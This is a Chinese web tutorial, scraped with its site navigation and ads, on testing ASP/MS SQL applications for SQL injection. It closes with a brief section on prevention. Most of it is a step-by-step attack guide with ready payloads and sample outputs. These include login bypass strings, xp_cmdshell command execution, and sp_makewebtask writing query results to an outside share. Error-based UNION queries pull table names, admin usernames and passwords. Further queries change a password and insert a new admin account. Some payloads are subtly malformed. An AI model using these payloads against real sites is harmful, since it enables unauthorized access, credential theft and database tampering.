SQL注入测试实例分析

style="DISPLAY: none" frameborder="0">

style="Z-INDEX: 9999; POSITION: absolute; DISPLAY: none" id="bdsIfr" frameborder="0">

分享到

• 一键分享
• QQ空间
• 新浪微博
• 百度云收藏
• 人人网
• 腾讯微博
• 百度相册
• 开心网
• 腾讯朋友
• 百度贴吧
• 豆瓣网
• 搜狐微博
• 百度新首页
• QQ好友
• 和讯微博
• 更多...

百度分享

脚 本 之 家 www.jb51.net

• 脚本云
• 专题
• 素材下载
• 电子书
• 软件下载
• 源码下载
• 服务器常用软件
• a5交易

• 首页
• 网页制作
• 脚本专栏
• 脚本下载
• 网络编程
• 数据库
• CMS教程
• 电子书籍
• 平面设计
• 媒体动画
• 操作系统
• 网站运营
• 网络安全

• 特色栏目： vbscript 正则表达式 javascript 批处理 服务器软件 素材下载

id="cproIframe_u336546_1" height="90" marginheight="0" src="http://pos.baidu.com/acom?adn=4&at=103&aurl=&cad=1&ccd=32&cec=gb2312&cfv=18&ch=0&col=zh-cn&conOP=0&cpa=1&dai=1&dis=0&ltr=http%3A%2F%2Fwww.jb51.net%2Fhack%2F&ltu=http%3A%2F%2Fwww.jb51.net%2Fhack%2F200734.html&lunum=6&n=jb51_cpr&pcs=1073x517&pis=10000x10000&ps=203x35&psr=1366x768&pss=1073x206&qn=3ec45bda991d2d9f&rad=&rsi0=960&rsi1=90&rsi5=4&rss0=%2396bdde&rss1=%23FFFFFF&rss2=%23006699&rss3=%23444444&rss4=%23444444&rss5=&rss6=%23e10900&rss7=&scale=&skin=&td_id=336546&tn=text_default_960_90&tpr=1435209044188&ts=1&version=2.0&xuanting=0&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u336546&ti=SQL%E6%B3%A8%E5%85%A5%E6%B5%8B%E8%AF%95%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90_%E8%84%9A%E6%9C%AC%E6%94%BB%E9%98%B2_%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8_%E8%84%9A%E6%9C%AC%E4%B9%8B%E5%AE%B6&tt=1435209043878.320.400.410" frameborder="0" width="960" allowtransparency="" marginwidth="0" scrolling="no" align="center,center" _xhe_src="http://pos.baidu.com/acom?adn=4&at=103&aurl=&cad=1&ccd=32&cec=gb2312&cfv=18&ch=0&col=zh-cn&conOP=0&cpa=1&dai=1&dis=0&ltr=http%3A%2F%2Fwww.jb51.net%2Fhack%2F&ltu=http%3A%2F%2Fwww.jb51.net%2Fhack%2F200734.html&lunum=6&n=jb51_cpr&pcs=1073x517&pis=10000x10000&ps=203x35&psr=1366x768&pss=1073x206&qn=3ec45bda991d2d9f&rad=&rsi0=960&rsi1=90&rsi5=4&rss0=%2396bdde&rss1=%23FFFFFF&rss2=%23006699&rss3=%23444444&rss4=%23444444&rss5=&rss6=%23e10900&rss7=&scale=&skin=&td_id=336546&tn=text_default_960_90&tpr=1435209044188&ts=1&version=2.0&xuanting=0&dtm=BAIDU_DUP2_SETJSONADSLOT&dc=2&di=u336546&ti=SQL%E6%B3%A8%E5%85%A5%E6%B5%8B%E8%AF%95%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90_%E8%84%9A%E6%9C%AC%E6%94%BB%E9%98%B2_%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8_%E8%84%9A%E6%9C%AC%E4%B9%8B%E5%AE%B6&tt=1435209043878.320.400.410">

• 脚本之家云服务器、主机托管
• 低价出售流量10000IP只需8元
• 【阿里云】超快云服务器，28.8元月/起
• 急急急！百万年薪招募SEO高手
• VeryCloud 专业cdn加速服务商
• 微子网络 湛江双线高防 抗15G 700元起
• 服务器租用/托管-域名空间/认准腾佑科技
• 脚本之家云主机，云空间，云服务器
• 众生网络 基于云计算的互联网基础服务运营商
• 双核10M独享云服务器特价98元/月
• BGP四线 亿恩1U服务器托管3999元/年
• 九九数据 — 工信部认可正规资质IDC接入商
• 枫信科技-江苏双线10M保证-399/元
• 四核15M独享服务器特价188元/月
• 免备vps20/百独799/双线350/45互联
• VeryCloud云主机，仅需29元，抢疯了！
• 鼎点网络百兆独享服务器仅需999元
• 免备案国内虚拟主机-163cdn
• 畅游网络 百独服务器 包跑满 998元
• 服务器租用 199/月起

• 
• 
• 
• 

当前位置 : 主页 > 网络安全 > 脚本攻防 >

SQL注入测试实例分析

来源：互联网 作者：佚名 时间：08-06 11:06:49 【大 中 小】

这篇文章主要为大家介绍了SQL注入测试实例分析,对于数据库安全非常重要,需要的朋友可以参考下

 

本文详细讲述了 sql注入的原理及防范技巧，目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己。希望能对大家有所帮助。

一、 介绍

　　当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并且你知道管理员经常为机器打补丁, 我们就不得不使用web攻击方式了. SQL注入是web攻击的一种类型 ,这种方式只需要开放80端口就够了并且即使管理员打了全部的补丁也能工作. 它攻击的目标是web程序(像ASP,JSP,PHP,CGI等)本身而不是web服务器或系统上运行的服务.

　　本文不介绍任何新的东西, SQL注入已经被广泛的讨论和使用. 我们写这篇文章目的是因为我们想要使用SQL注入进行一些演练测试,希望这个能对各位有用. 你可以在这里找到一两个窍门但是请你关注下"9.0 哪里有更多的信息?" 可以得到关于SQL注入更多，更深入的技术.

　　1.什么是SQL注入：

　　通过网页的输入项来注入SQL查询或命令是一种技巧。许多网页会从用户那里获取参数，并构建SQL查询来访问数据库。以用户登录为例，页面收集用户名和密码然后构建SQL去查询数据库，来校验用户名和密码的有效性。通过SQL注入，我们可以发送经过精心编造的用户名和/或密码字段，来改变SQL查询语句并赋予 我们其它一些权限。

　　2.你需要什么：

　　任意web浏览器。

二、 你应该寻找什么

　　尝试寻找那些允许你提交数据的页面，即: 登录页面，查询页面，反馈信息等等。有时，HTML页面会用POST命令来把参数发送到另外一个ASP页面上去。那么，你可能在URL中看不到参数。不过，你可以查看页面的HTML源代码，查找"FORM"标签。你会在一些HTML源代码中看到类似下面的东东:

　　

复制代码

代码如下:

<FORM action=Search/search.asp method=post></p> <p>　　<input type=hidden name=A value=C></p> <p>　　</FORM>

　　位于<FORM>和</FORM>之间的所有内容都可能暗含着有用的参数(利用你的智慧)。

　　2.1 如果你找不到任何带有输入框的页面怎么办?

　　你应该寻找诸如ASP, JSP, CGI, 或 PHP这样的页面。尤其要找那些携带有参数的 URL，比如:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10

三、如何测试它是否是易受攻击的

1.从一个单引号技巧开始。输入类似这样的内容:

　　

复制代码

代码如下:

hi' or 1=1--

　　到登录页面中，或者密码中，甚至直接在URL中。例如:

　　

复制代码

代码如下:

- Login: hi' or 1=1--　</p> <p>　　- Pass: hi' or 1=1--</p> <p>　　- http://XXX/index.asp?id=hi' or 1=1--

　　假如你必须在一个hidden字段中来这样做，就把HTML源代码下载下来，保存到硬盘上，修改URL和相应的 hidden字段。例如:

　　

复制代码

代码如下:

<FORM action=http://XXX/Search/search.asp method=post></p> <p>　　<input type=hidden name=A value="hi' or 1=1--"></p> <p>　　</FORM>

　　如果够幸运，不需要任何用户名和密码你就可以登录。

2.为什么是 ' or 1=1--

　　让我们通过另外一个例子来展示' or 1=1-- 的重要性。除了能绕过“登录”验证，它还能展示一些在正常情况下很难看到的额外信息。假设，有一个ASP页面，其功能是将我们导航到下面的URL：

　　

复制代码

代码如下:

http://XXX/index.asp?category=food

　　在URL中，'category'是变量名；food是赋给变量的值。为了完成导航功能，我们猜想ASP页面应该包含下面的代码（这些代码是我们为了完成此测试而编写的真实代码）：

　　

复制代码

代码如下:

v_cat = request("category") </p> <p>　　sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'" </p> <p>　　set rs=conn.execute(sqlstr)

　　如上所示，变量v_cat获取了参数category的值，SQL语句将变成：

　　

复制代码

代码如下:

SELECT * FROM product WHERE PCategory='food'

　　该SQL语句将返回符合where条件的的结果集。在本例中，where条件是PCategory='food' 。

　　下面，假设我们将URL改成下面的形式：

　　

复制代码

代码如下:

http://XXX/index.asp?category=food' or 1=1--

　　现在，变量v_cat等于"food' or 1=1-- "。将变量v_cat在SQL中进行替换，我们将得到下面语句：

　　

复制代码

代码如下:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

　　该语句将得到product表中所有记录，无论PCategory是否等于'food'。“--”告诉MS SQL server忽略其后面的所有内容（笔者注：其实可以理解为注释，“--”后面所有的内容都为注释），方便我们处理单引号。在某些情况下，"--"可以被替换成”#“。

　　如果后台的数据库不是SQL Server，查询语句的单引号就不能被忽略。在这种情况下，我们可以尝试下面的查询条件：

　　

复制代码

代码如下:

' or 'a'='a

　　此时，SQL语句将变成：

　　

复制代码

代码如下:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

　　根据真实的SQL语句，我们还可以尝试以下各种变形：

　　

复制代码

代码如下:

' or 1=1-- </p> <p>　　" or 1=1-- </p> <p>　　or 1=1-- </p> <p>　　' or 'a'='a </p> <p>　　" or "a"="a </p> <p>　　') or ('a'='a

四、如何通过SQL注入来进行远程执行

　　能够注入SQL命名通常意味着我们可以随意执行任何SQL查询。默认安装的MS SQL 服务是作为SYSTEM来运行的， 它相当于 Windows系统中的Administrator。我们可以利用存储过程，比如master..xp_cmdshell 来进行远程执行:

　　

复制代码

代码如下:

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

　　如果单引号(')不管用，可以试试双引号 (")。

　　分号会终止当前的SQL查询，这就允许你开始一个新的SQL命名。要验证命令是否执行成功，你需要监听来自10.10.1.2的 ICMP数据包，检查是否收到来自服务器的数据包:

　　

复制代码

代码如下:

#tcpdump icmp

　　如果你没有收到任何来自服务器的ping请求，并且收到了暗示许可错误的信息，则有可能是管理员限制了Web用户对存储过程的访问。

五、如何获取SQL查询的输出

　　可以通过使用sp_makewebtask把你的查询写入到HTML:

　　

复制代码

代码如下:

'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

　　注意这个目标IP的文件夹"share"的共享权限是Everyone.

六、如何从数据库的ODBC错误消息中获取数据

　　我们几乎可以在MS SQL服务器产生的错误消息中得到任何我们想要的数据. 通过类似下面的这个地址:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10

　　我们将试图把这个整数'10'和另外的字符串进行UNION联合操作:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

　　系统表 INFORMATION_SCHEMA.TABLES 包含了服务器上所有表的信息. 这个TABLE_NAME 字段包含数据库中每个表的字段. 这样就不存在无此表无此字段的问题了. 看我们的查询语句:

　　

复制代码

代码如下:

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

　　这个语句将会返回数据库中第一个表的名字. 当我们使用这个字符串值和一个数字'10'进行UNION操作, MS SQL 服务器将会试图转换这个字符串(nvarchar)为一个数字. 这会产生一个错误, 因为我们不能把nvarchar类型转换成数字. 服务器将会产生以下错误信息:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5

　　这个错误消息清楚的告诉我们这个值不能转换为数字. 同时呢,里面也包含了数据库中第一个表的名字 ,就是"table1".

　　想获取下一个表的名字,我们使用下面的语句:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

　　我们也可以使用LIKE关键词来搜索数据:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

　　输出:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
/index.asp, line 5

　　这个匹配, '%25login%25' 的结果和 %login% 是一样的在SQL Server服务器中.这样,我们将得到 匹配的第一个表的名字, "admin_login".

1.如何挖掘到表所有列的名称

　　我们可以使用另一个非常有用的表INFORMATION_SCHEMA.COLUMNS 来标出某一个的表所有列名:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

　　输出:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
/index.asp, line 5

　　注意错误提示,里面已经包含了第一个列名, 下面我们使用NOT IN ()来取得下一个列的名称:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

　　输出:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
/index.asp, line 5

　　按上面的步骤继续下一个,我们就能获得剩下的所有列的名称, 即"password", "details"等列. 当我们得到下面的这个错误提示时,就表示我们已经找出所有的列名了.

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

　　输出:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.</p> <p>　　/index.asp, line 5

2.如何检索到我们想要的数据

　　现在我们已经确认了一些重要的表，以及它们的列名,我们可以用同样的技巧从数据库中挖掘任何我们想要的信息.

　　现在,让我们从这个"admin_login"表中得到第一个login_name的值吧:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

　　输出:

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.</p> <p>　　/index.asp, line 5

　　根据上面的错误提示我们知道这里有一个管理员的登录名是"neo".下面,我们从数据库中到"neo"的密码:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--</p> <p>　　Output:</p> <p>　　Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.</p> <p>　　/index.asp, line 5

　　密码就在错误提示里了,现在让我们用"neo"和密码"m4trix"登录试试吧.

3.如何获取数字型字符串的值

　　上面所述的技术具有局限性。在我们试图转换包含有效数字（即只是0-9之间的字符）的时候，我们没有得到任何错误信息。让我们试着获取"trinity"的密码"31173":

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'

　　我们可能得到"此页面不存在“的错误。原因在于：在于整数（这时是10）联接之前，密码"31173"将转换为一个数字。由于这是一个有效地联接（UNION）语句，因此SQL Server不会抛出ODBC错误信息，因此我们将不能获取到任何数字型的项。

　　为了解决这个问题，我们给数字型字符串后面提交一些字母，这样可以确保转换失效。让我们看看下面这个查询：

　　

复制代码

代码如下:

http://XXX/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'

　　我们只是给我们需要的密码文本后添加了加号（+）。（“+”的ASCII编码是0x2b）。我们将给真正的密码后添加“（空格）休眠符“。因此，即使我们有一个字符型字符串”31173“，它最终将变为”31173休眠符“。通过手工调用convert()函数试图把“31173休眠符“转换为整数时，SQL Server抛出ODBC错误信息：

　　

复制代码

代码如下:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'</p> <p>　　[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.</p> <p>　　/index.asp, line 5

　　现在，你就可以使用密码为"31173"的"trinity"用户登陆了。

七、如何向数据库中更新或插入数据

　　当我们成功的获取到一张表的所有字段名后，我们就有可能UPDATE甚至INSERT一条新记录到该表中。例如，修改"neo"的密码:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

　　下面INSERT一条新记录到数据库中:

　　

复制代码

代码如下:

http://XXX/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

　　现在我们可以用用户名"neo2"和密码"newpas5"来登录了。

八、如何避免SQL注入

　　过滤参数中的单引号、双引号、斜杠、反斜杠、分号等字符；以及NULL、回车符、换行符等扩展字符。这些参数可能来自于：

前台表单（form）中的用户输入
URL中的参数
cookie
　　对于数字，在将其传入SQL语句之前将其从字符串(String)转换成数字(Number)；或者用ISNUMERIC函数确定其确实是数字。

　　将SQL Server的运行用户修改为低权限用户（low privilege user)。

　　删除不再需要的存储过程，例如：master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask  更多